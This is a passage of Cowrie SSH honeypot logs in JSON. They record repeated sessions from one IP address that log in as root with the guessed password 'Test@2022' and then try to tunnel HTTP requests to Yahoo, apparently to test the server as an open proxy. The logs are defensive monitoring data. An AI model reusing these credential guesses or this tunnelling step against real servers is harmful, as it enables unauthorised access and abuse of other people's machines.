{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.545220Z","src_ip":"213.209.150.239","session":"0a4a54858109"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9539,"dst_ip":"1.2.3.4","dst_port":22,"session":"c83451c45ba6","protocol":"ssh","message":"New connection: 213.209.150.239:9539 (1.2.3.4:22) [session: c83451c45ba6]","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.591357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.592325Z","src_ip":"213.209.150.239","session":"c83451c45ba6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.639612Z","src_ip":"213.209.150.239","session":"c83451c45ba6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.875300Z","src_ip":"213.209.150.239","session":"c83451c45ba6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":23682,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:23682","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.923681Z","session":"c83451c45ba6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.971279Z","src_ip":"213.209.150.239","session":"c83451c45ba6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":18113,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18113","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.105492Z","session":"c83451c45ba6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.152555Z","src_ip":"213.209.150.239","session":"c83451c45ba6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.200255Z","src_ip":"213.209.150.239","session":"c83451c45ba6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9576,"dst_ip":"1.2.3.4","dst_port":22,"session":"7382b716214f","protocol":"ssh","message":"New connection: 213.209.150.239:9576 (1.2.3.4:22) [session: 7382b716214f]","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.255727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.256709Z","src_ip":"213.209.150.239","session":"7382b716214f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.313124Z","src_ip":"213.209.150.239","session":"7382b716214f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.595253Z","src_ip":"213.209.150.239","session":"7382b716214f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16490,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16490","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.653580Z","session":"7382b716214f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.710437Z","src_ip":"213.209.150.239","session":"7382b716214f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":23755,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:23755","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.866848Z","session":"7382b716214f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.923596Z","src_ip":"213.209.150.239","session":"7382b716214f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:41.980846Z","src_ip":"213.209.150.239","session":"7382b716214f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9638,"dst_ip":"1.2.3.4","dst_port":22,"session":"723e0cb03a0b","protocol":"ssh","message":"New connection: 213.209.150.239:9638 (1.2.3.4:22) [session: 723e0cb03a0b]","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.036834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.037745Z","src_ip":"213.209.150.239","session":"723e0cb03a0b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.094477Z","src_ip":"213.209.150.239","session":"723e0cb03a0b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.376819Z","src_ip":"213.209.150.239","session":"723e0cb03a0b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":28049,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:28049","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.434366Z","session":"723e0cb03a0b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.491216Z","src_ip":"213.209.150.239","session":"723e0cb03a0b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":13683,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:13683","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.647158Z","session":"723e0cb03a0b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.703880Z","src_ip":"213.209.150.239","session":"723e0cb03a0b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.761895Z","src_ip":"213.209.150.239","session":"723e0cb03a0b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9684,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c9fd77e059a","protocol":"ssh","message":"New connection: 213.209.150.239:9684 (1.2.3.4:22) [session: 5c9fd77e059a]","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.817306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.819164Z","src_ip":"213.209.150.239","session":"5c9fd77e059a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:42.875877Z","src_ip":"213.209.150.239","session":"5c9fd77e059a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.157897Z","src_ip":"213.209.150.239","session":"5c9fd77e059a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":11523,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:11523","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.215717Z","session":"5c9fd77e059a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.272370Z","src_ip":"213.209.150.239","session":"5c9fd77e059a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":21314,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:21314","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.427000Z","session":"5c9fd77e059a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.483711Z","src_ip":"213.209.150.239","session":"5c9fd77e059a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.541663Z","src_ip":"213.209.150.239","session":"5c9fd77e059a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9739,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e30472fba79","protocol":"ssh","message":"New connection: 213.209.150.239:9739 (1.2.3.4:22) [session: 2e30472fba79]","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.588138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.588980Z","src_ip":"213.209.150.239","session":"2e30472fba79"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.636295Z","src_ip":"213.209.150.239","session":"2e30472fba79"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.871656Z","src_ip":"213.209.150.239","session":"2e30472fba79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":4018,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:4018","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.919968Z","session":"2e30472fba79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:43.967509Z","src_ip":"213.209.150.239","session":"2e30472fba79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":6637,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:6637","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.105581Z","session":"2e30472fba79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.152909Z","src_ip":"213.209.150.239","session":"2e30472fba79"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.201022Z","src_ip":"213.209.150.239","session":"2e30472fba79"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9785,"dst_ip":"1.2.3.4","dst_port":22,"session":"afb10b7eb37e","protocol":"ssh","message":"New connection: 213.209.150.239:9785 (1.2.3.4:22) [session: afb10b7eb37e]","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.256642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.257326Z","src_ip":"213.209.150.239","session":"afb10b7eb37e"}
{"eventid":"cowrie.session.closed","duration":12.470087051391602,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.307592Z","src_ip":"212.227.235.229","session":"e2d5f1408799"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-